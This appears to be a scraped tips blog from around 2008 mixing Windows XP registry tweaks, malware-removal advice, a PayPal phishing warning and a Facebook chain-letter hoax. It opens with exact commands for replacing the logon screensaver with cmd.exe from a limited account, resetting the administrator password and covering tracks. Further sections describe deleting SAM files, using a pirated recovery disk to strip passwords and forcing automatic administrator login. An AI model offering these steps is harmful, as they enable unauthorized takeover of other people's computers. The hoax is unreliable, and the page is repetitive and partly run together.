Hacking XP : :
How to hack windows XP admin password : :
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
“net user password”
If the Administrator Account is called Frank and you want the password blah enter this
“net user Frank blah”
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Add Open With to all files : :
You can add “Open With…” to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the “.txt” key.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named “OpenWith” by right clicking the “Shell” Key and selecting new
4. Set the (Default) to “Op&en With…”
5. Add a new Key named “Command” by right clicking the “OpenWith” Key and selecting new
6. Set the (Default) to “C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1″, C:\ being your Windows drive. You must enter the “OpenAs_RunDLL %1″ exactly this way.
Customize the System Tray : :
You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you can corrupt some trial licenses of software that you may have downloaded.
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, “s1159″ and “s2359″
4. Right click the new value name and modify. Enter anything you like up to 8 characters.
If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM.
Lock Out Unwanted Users : :
Want to keep people from accessing Windows, even as the default user? If you do not have a domain do not attempt this.
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value “MustBeValidated”
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x
Disable the Outlook Express Splash Screen : :
You can make OutLook Express load quicker by disabling the splash screen:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\OutLook Express
3. Add a string value “NoSplash”
4. Set the value data to 1 as a Dword value
Multiple Columns For the Start Menu : :
To make Windows use multiple Start Menu Columns instead of a single scrolling column, like Windows 9x had, Also if you are using Classic Mode in XP
1. Open RegEdit
2. Go to the key
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Advanced
3. Create a string value “StartMenuScrollPrograms”
4. Right click the new string value and select modify
5. Set the value to “FALSE”
Change the Registered Change the User Information : :
You can change the Registered Owner or Registered Organization to anything you want even after Windows is installed.
1) Open RegEdit
2) Got to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion.
3) Change the value of “RegisteredOrganization” or “RegisteredOwner”, to what ever you want
Changing Windows’ Icons : :
You can change the Icons Windows uses for folders, the Start Menu, opened and closed folder in the Explorer, and many more.
1. Open RegEdit
2. Go to
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Icons
3. Add a string value for each Icon you wish to change.
Example: “3″ =”C:\Windows\Icons\MyIcon.ico,0″ This will change the closed folders in the Explorer to “MyIcon.ico”. Here is a complete list for each value.
0= Unknown file type
1= MSN file types
2= Applications Generic
3= Closed Folder
4= Open Folder
5= 5.25″ Drive
6= 3.25″ Drive
7= Removable Drive
8= Hard Drive
9= NetWork Drive
10= Network Drive Offline
11= CD-ROM Drive
12= RAM Drive
13= Entire Network 14= Network Hub
15= My Computer
16= Printer
17= Network Neighborhood
18= Network Workgroup
19= Start Menu’s Program Folders
20= Start Menu’s Documents
21= Start Menu’s Setting
22= Start Menu’s Find
23= Start Menu’s Help
24= Start Menu’s Run
25= Start Menu’s Suspend
26= Start Menu’s PC Undock
27= Start Menu’s Shutdown 28= Shared
29= Shortcut Arrow
30= (Unknown Overlay)
31= Recycle Bin Empty
32= Recycle Bin Full
33= Dial-up Network
34= DeskTop
35= Control Panel
36= Start Menu’s Programs
37= Printer Folder
38= Fonts Folder
39= Taskbar Icon
40= Audio CD
You need to reboot after making changes. You may need to delete the hidden file ShellIconCache if after rebooting the desired Icons are not displayed.
Change Default Folder Locations You can change or delete the Windows mandatory locations of folder like My documents : :
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Folders
3. Change the desired folder location, My Documents is normally list as “Personal”
4. Open the Explorer and rename or create the folder you wish.
To change the desired location of the Program Files folder
1. Go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
2. Change the value of “ProgramFiles”, or “ProgramFilesDir”
Now when you install a new program it will default to the new location you have selectedOpening a DOS Window to either the Drive or Directory in ExplorerAdd the following Registry Keys for a Directory:
HKEY_CLASSES_ROOT\Directory\shell\opennew
@=”Dos Prompt in that Directory”
HKEY_CLASSES_ROOT\Directory\shell\opennew\command
@=”command.com /k cd %1″
Add or Edit the following Registry Keys for a Drive:
HKEY_CLASSES_ROOT\Drive\shell\opennew
@=”Dos Prompt in that Drive”
HKEY_CLASSES_ROOT\Drive\shell\opennew\command
@=”command.com /k cd %1″
These will allow you to right click on either the drive or the directory and the option of starting the dos prompt will pop up.
Changing Exchange/Outlook Mailbox location : :
To change the location of your mailbox for Exchange:
1. Open RegEdit
2. Go to
HKEY_CURRENT_USER\Software\ Microsoft\Windows Messaging Subsystem\ Profiles
3. Go to the profile you want to change
4. Go to the value name that has the file location for your mailbox (*.PST) file
5. Make the change to file location or name
To change the location of your mailbox for Outook : :
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\Outlook (or Outlook Express if Outlook Express)
3. Go to the section “Store Root”
4. Make the change to file location
Add/Remove Sound Events from Control Panel
You can Add and delete sounds events in the Control Panel. In order to do that:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\AppEvents\Schemes\Apps and HKEY_CURRENT_USER\AppEvents\Schemes\Eventlabels. If this key does not exist you can create it and add events.
3. You can add/delete any items you want to or delete the ones you no longer want.
Registry Hacking : :
Display legal notice on startup : :
Wanna tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
“legalnoticecaption”=”enter your notice caption”
“legalnoticetext”=”enter your legal notice text”
Automatic Administrator Login:
Well here’s the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“AutoAdminLogon”=”1″
No shutdown : :
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
“NoClose”=”DWORD:1″
Menu delays : :
Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run…, then typing ‘regedit’ and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.
GPEDIT.MSC And Autoplay : :
A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run… and then type in ‘gpedit.msc’ and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value ‘Turn Off Autoplay’. Right-click on it and then click ‘Properties’.
Increasing options in add/remove programs : :
Not a fan of MSN Messenger? don’t want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP’s ‘built in’ programs are visible. it’s fairly easy to change, though… just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
This is a list of all components installed at the moment. I’ve taken the example of MSN Messenger - the program entry called ‘msmsgs’, third-last line. You can see the word ‘hide’ highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word ‘hide’ like so:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word “,hide” and replace it with a single comma “,”.
Automatically Kill Programs At shutdown : :
don’t you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.
Speeding Up Share viewing : :
This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it’s fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!
Create a Shortcut to Lock Your Computer : :
Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it “Lock Workstation” or choose any name you like. Click Finish. You can also change the shortcut’s icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.
Speed up Internet Explorer 6 Favorites : :
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes–I’ve noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here’s a fix for the problem that does work, though it’s unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.
Aspi : :
WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up “My computer” and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called “Recording”. On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That’s is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.
Another way …
Boot from win98 cd, delete the SAM, SAM।SAV, SAM.LOg files ( in sytem32/config folder ). Note: don’t delete SAM.exe.
Thursday, March 6, 2008
Registry Editing Has Been Disabled By Your Administrator
Today a friend of mine asked that his registry editor had been disabled accidently and now how should he enable it back again. Here are two ways to enable the registry editing in Windows.
1- From Group Policy Editor
Go to Run –> gpedit.msc
In the left hand menu, go to User Config –> Administrative Templated –> System.
Now In the right hand pane, select “Prevent access to registry editing tools”. It will probably be not configured or enabled. If it’s enabled, disable it and if it’s not configured, first enable it, apply settings and then disable it. Most probably the settings have been applied instantly. If not, then run gpupdate in command prompt to apply the group policies.
2- From the Run Menu
I got this tweak while surfing the internet. Go to Start –> Run, copy and paste the follow in the Run box and press OK.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
The effects are usually instant. If not then you should see the results after restarting your computer.
Please tell us your experiences on this tweak.
1- From Group Policy Editor
Go to Run –> gpedit.msc
In the left hand menu, go to User Config –> Administrative Templated –> System.
Now In the right hand pane, select “Prevent access to registry editing tools”. It will probably be not configured or enabled. If it’s enabled, disable it and if it’s not configured, first enable it, apply settings and then disable it. Most probably the settings have been applied instantly. If not, then run gpupdate in command prompt to apply the group policies.
2- From the Run Menu
I got this tweak while surfing the internet. Go to Start –> Run, copy and paste the follow in the Run box and press OK.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
The effects are usually instant. If not then you should see the results after restarting your computer.
Please tell us your experiences on this tweak.
Task Manager has been disabled by your administrator
My friend asks that whenever he tries to open the task manager, he is encountered by the following error:
“Task Manager has been disabled by your administrator”
Here is solution about enabling the task manager:
Enabling Task Manager from Group Policy Editor -
1. Go to “Start” -> “Run” -> Write “Gpedit.msc” and press on “Enter” button.
2. Navigate to “User Configuration” -> “Administrative Templates” -> “System” -> “Ctrl+Alt+Del Options”
3. In the right side of the screen verity that “Remove Task Manager”" option set to “Disable” or “Not Configured”.
4. Close “Gpedit.msc” MMC.
5. Go to “Start” -> “Run” -> Write “gpupdate /force” and press on “Enter” button.
Enabling Task Manager from Registry Editor -
1. Go to “Start” -> “Run” -> Write “regedit” and press on “Enter” button.
Warning: Modifying your registry can cause serious problems that may require you to reinstall your operating system.
Always backup your files before doing this registry hack.
2. Navigate to the following registry keys and verity that following settings set to default:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“DisableCAD”=dword:00000000
3. Reboot the computer.
For your convenience, I have created a registry file. Just download, double click it and add the info to your registry. The task manager will be enabled. Post your experiences please.
Enabling Task Manager from the Run Menu -
Abdullah mailed me this solution. Go to Start –> Run and copy and paste the following and press OK.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /fPublish Post
“Task Manager has been disabled by your administrator”
Here is solution about enabling the task manager:
Enabling Task Manager from Group Policy Editor -
1. Go to “Start” -> “Run” -> Write “Gpedit.msc” and press on “Enter” button.
2. Navigate to “User Configuration” -> “Administrative Templates” -> “System” -> “Ctrl+Alt+Del Options”
3. In the right side of the screen verity that “Remove Task Manager”" option set to “Disable” or “Not Configured”.
4. Close “Gpedit.msc” MMC.
5. Go to “Start” -> “Run” -> Write “gpupdate /force” and press on “Enter” button.
Enabling Task Manager from Registry Editor -
1. Go to “Start” -> “Run” -> Write “regedit” and press on “Enter” button.
Warning: Modifying your registry can cause serious problems that may require you to reinstall your operating system.
Always backup your files before doing this registry hack.
2. Navigate to the following registry keys and verity that following settings set to default:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“DisableCAD”=dword:00000000
3. Reboot the computer.
For your convenience, I have created a registry file. Just download, double click it and add the info to your registry. The task manager will be enabled. Post your experiences please.
Enabling Task Manager from the Run Menu -
Abdullah mailed me this solution. Go to Start –> Run and copy and paste the following and press OK.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /fPublish Post
Facebook Deleting Inactive Users
Attention all Facebook membeRs.
Facebook is recently becoming very overpopulated, There have been many members complaining that Facebook is becoming very slow.Record shows that the reason is that there are too many non-active Facebook members And on the other side too many new Facebook members. We will be sending this messages around to see if the Members are active or not,If you're active please send to other users using Copy+Paste to show that you are active Those who do not send this message within 2 weeks, The user will be deleted without hesitation to create more space, If Facebook is still overpopulated we kindly ask for donations but until then send this message to all your friends and make sure you send this message to show me that your active and not deleted.
Founder of Facebook
Mark Zuckerberg
Facebook is recently becoming very overpopulated, There have been many members complaining that Facebook is becoming very slow.Record shows that the reason is that there are too many non-active Facebook members And on the other side too many new Facebook members. We will be sending this messages around to see if the Members are active or not,If you're active please send to other users using Copy+Paste to show that you are active Those who do not send this message within 2 weeks, The user will be deleted without hesitation to create more space, If Facebook is still overpopulated we kindly ask for donations but until then send this message to all your friends and make sure you send this message to show me that your active and not deleted.
Founder of Facebook
Mark Zuckerberg
Windows Vienna(now Windows 7)
Now that Vista is on the shelves, Microsoft is focusing on its next major operating system release, Windows Vienna. Even though Windows Vienna is going to be a major release with a totally revised GUI, Microsoft made a bold statement: by the end of 2009 Vienna will hit the shelves.
However, Microsoft needs to keep the buzz on Windows Vista for now and so they are not releasing any Windows Vienna official information to the public yet, expect for the fact that they are working on it.
Julie Larson-Green, responsible for the user interface of Office 2007, and also the person behind the ribbon-like interface has been transferred to the Windows 7 team.
The current release date of the Windows 7 operating system is expected to be in late 2009, early 2010, returning to the 3-year pause between desktop operating system versions that was common at Microsoft for all Windows versions prior to Windows Vista.
The most common dilema about Windows 7 right now is whether or not to use backward compatibility. Strong rumours have suggested that the OS will be developed from scratch on top of the Windows NT kernel, given its maturity in both security and stability terms. The backward compatibility, however, is something that Microsoft developers would frown upon, since it prevents truly revolutional ideas to be implemented. Windows Vista, because of its backward compatibile, carries a large amount of code libraries with it, thus the large size of the operating system. However, many businesses that haven't upgraded their software in a decade or more would not purchase Windows 7 if it was not compatible with their applications. As a result, the current options that Microsoft has are to either make Windows 7 backward compatible, or to maintain a legacy version of Windows in parallel, for for the business customers, one which will be kept alive by Microsoft though patches and updates
Enable Hibernation in Vista
If you somehow managed to switch off hibernation in Vista, probably by deleting the hiberfil.sys file using Disk Cleanup, here's how to switch it back on.
1. Press the Windows key and type cmd followed by Ctrl+Shift+Enter to open in administrator mode.
2. Authenticate as an administrator by clicking continue or entering your administrator password (if UAC is enabled).
3. In the Command Prompt window, issue the command:
powercfg –h on
4. Close the Command Prompt window and restart.
Of course you can switch hibernation back off again by changing on to off in the above command.
1. Press the Windows key and type cmd followed by Ctrl+Shift+Enter to open in administrator mode.
2. Authenticate as an administrator by clicking continue or entering your administrator password (if UAC is enabled).
3. In the Command Prompt window, issue the command:
powercfg –h on
4. Close the Command Prompt window and restart.
Of course you can switch hibernation back off again by changing on to off in the above command.
How to defend your Computer From Hacker -1
1. Stop using Internet Explorer and make the switch to Firefox, it's more secure, plain and simple.
2. Get Spybot Search and Destroy and immediately update it.
3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)
4. Update your antivirus
5. Boot into safe mode and run all three scans
6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.
10. Make sure your firewall doesn't have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows. Good luck!
2. Get Spybot Search and Destroy and immediately update it.
3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)
4. Update your antivirus
5. Boot into safe mode and run all three scans
6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.
10. Make sure your firewall doesn't have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows. Good luck!
Hacking Windows XP Administrator Password
The software provided is not available on net anymore.It is called ERD Commander 2005.The company which made it was bought by Micro$oft and they discontinued it.It is a VERY POWERFUL software SO DON"T SHARE IT CUZ THEN THEY MIGHT HACK U.
1. Download this file from here(click here to download)
2. It is a rar file.Extract it to get a ISO file.
3. Write the iso file to a cd.
4. Boot the computer using the cd.
5. Use the lock smith using to remove the password.
Other Features Of ERD Commander
ERD Commander
When your server or workstation won't boot, you need ERD Commander 2005. ERD Commander 2005 boots dead systems directly from CD into a Windows-like repair environment. You'll have full access to the dead system's volumes, so you can diagnose and repair problems using tools located on the ERD Commander 2005 Start menu. And you'll have built-in network access to safely move data off of, or on to, the dead system. With ERD Commander 2005 you can repair a system quickly and easily, saving you time and rescuing your critical data.
* Boots dead systems directly from CD
* Easy, familiar Windows-like interface
* Intuitive Solution Wizard helps you select the right tool to correct your system issue
* Includes Crash Analyzer Wizard to pinpoint the cause of recent system crashes for repair
* Allows complete disk sanitizing/data removal with Disk Wipe utility
* Includes the Locksmith utility to reset lost Administrator passwords
* Includes FileRestore so that you can quickly find and recover deleted files
* Provides access to XP Restore Points on unbootable Windows XP systems
* Detect malware and other applications that may be consuming system resources
* Includes an Internet browser to facilitate downloading needed files and patches
* Compares key info on unbootable systems with that of a working system for diagnosis and troubleshooting
* Automatically identifies and replaces critical system files that have become corrupt
* Allows for formatting and partitioning of disks
* Provides emergency removal capability for faulty hotfixes
* Built-in network access to safely copy data to/from dead systems
* Repair and diagnostic tools located on Start menu
* Repair tools include System Restore tool, System File Repair, Service and Driver Manager, Hotfix Uninstall Wizard, Locksmith, Registry Editor, Explorer, Disk Management, and Command Prompt
* Data recovery tools include Disk Commander and FileRestore
* Diagnostic tools include Crash Analyzer Wizard, System Compare, Autoruns, Event Log Viewer, System Information, TCP/IP Configuration, and Logical volumes utilities
* Compatible with Windows NT, 2000, XP, and Server 2003
1. Download this file from here(click here to download)
2. It is a rar file.Extract it to get a ISO file.
3. Write the iso file to a cd.
4. Boot the computer using the cd.
5. Use the lock smith using to remove the password.
Other Features Of ERD Commander
ERD Commander
When your server or workstation won't boot, you need ERD Commander 2005. ERD Commander 2005 boots dead systems directly from CD into a Windows-like repair environment. You'll have full access to the dead system's volumes, so you can diagnose and repair problems using tools located on the ERD Commander 2005 Start menu. And you'll have built-in network access to safely move data off of, or on to, the dead system. With ERD Commander 2005 you can repair a system quickly and easily, saving you time and rescuing your critical data.
* Boots dead systems directly from CD
* Easy, familiar Windows-like interface
* Intuitive Solution Wizard helps you select the right tool to correct your system issue
* Includes Crash Analyzer Wizard to pinpoint the cause of recent system crashes for repair
* Allows complete disk sanitizing/data removal with Disk Wipe utility
* Includes the Locksmith utility to reset lost Administrator passwords
* Includes FileRestore so that you can quickly find and recover deleted files
* Provides access to XP Restore Points on unbootable Windows XP systems
* Detect malware and other applications that may be consuming system resources
* Includes an Internet browser to facilitate downloading needed files and patches
* Compares key info on unbootable systems with that of a working system for diagnosis and troubleshooting
* Automatically identifies and replaces critical system files that have become corrupt
* Allows for formatting and partitioning of disks
* Provides emergency removal capability for faulty hotfixes
* Built-in network access to safely copy data to/from dead systems
* Repair and diagnostic tools located on Start menu
* Repair tools include System Restore tool, System File Repair, Service and Driver Manager, Hotfix Uninstall Wizard, Locksmith, Registry Editor, Explorer, Disk Management, and Command Prompt
* Data recovery tools include Disk Commander and FileRestore
* Diagnostic tools include Crash Analyzer Wizard, System Compare, Autoruns, Event Log Viewer, System Information, TCP/IP Configuration, and Logical volumes utilities
* Compatible with Windows NT, 2000, XP, and Server 2003
Virus in yahoo messenger, automatically sending links- gaigoitanbinh.xlphp.net
EDIT - Running Windows is Safe Mode is pretty easy. First of all, restart your computer. When it's booting (black screen with / without writings before the Windows XP logo comes up), press F8 button on your desktop. Your computer will stop booting and give you some options like -
Start in Safe Mode
Start in Safe Mode with Networking
Start Windows XP normally etc.
Choose "Start in Safe Mode". Your computer will start with a black background and with a very hazy display. Open McAfee now and scan your computer. Restart again (without pressing F8) when you are done to start Windows in Normal Mode.
Is your McAfee fully updated? If no, then update it first of all and then run a full system scan. If it still finds nothing, then do an online Panda ActiveScan (it will scan your computer and remove most infections without you having to download anything):
http://www.pandasecurity.com/homeusers/s...
I am sure that McAfee or Panda will get rid of the virus.
Good luck!
:)
Start in Safe Mode
Start in Safe Mode with Networking
Start Windows XP normally etc.
Choose "Start in Safe Mode". Your computer will start with a black background and with a very hazy display. Open McAfee now and scan your computer. Restart again (without pressing F8) when you are done to start Windows in Normal Mode.
Is your McAfee fully updated? If no, then update it first of all and then run a full system scan. If it still finds nothing, then do an online Panda ActiveScan (it will scan your computer and remove most infections without you having to download anything):
http://www.pandasecurity.com/homeusers/s...
I am sure that McAfee or Panda will get rid of the virus.
Good luck!
:)
careful with your PAYPAL ACCOUNT(fake Paypal.com)
if you got a e-mail with a subject is "paypal confirmation" . paypal want to review your account and you can click a "Resolution center" for your confirmation. A "resolution link" is www.paypalupdate.com. So ignore it and do not click a link because PAYPAL NEVER SEND ANY E MAIL AND CALL US LIKE DEAR CUSTOMER OR DEAR PAYPAL MEMBER. Paypal always use our real name when paypal send us a e-mail.
So for paypal member, please be careful. if you got a peculiar e-mail report it to paypal. If you already click that link and already write username and your password, maybe a best advice is close your account as soon as possible.
So for paypal member, please be careful. if you got a peculiar e-mail report it to paypal. If you already click that link and already write username and your password, maybe a best advice is close your account as soon as possible.
amvo.exe Virus Manual Removal Steps
This is a nasty virus, dont know who dropped it on me. It spreads via USB Memory Sticks. It cannot be seen in the process list, hides itself and hides all files. And my antivirus doesn't seem to find a problem! :(
symptoms
* Cannot show hidden files
* Slows down USB devices
* Adds infections to plugged in USB devices
* Drives open in new windows from My Computer
How to get rid off?
Step 1
The usual way is to Format the system, but it is not a permanent solution. To get rid run regedit, find all keys related to amvo.exe or the name of the virus.
Run msconfig in the Start Up Tab you can find the amvo.exe or its variants.
Remove all occurrence of the name from regedit.
Reboot the System.
Step 2
Reboot and do the following changes to the Registry using regedit
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer searchidden en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer searchsystemdirs en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced hidden en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced showsuperhiden en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced superhiden en 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN CheckedValue 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
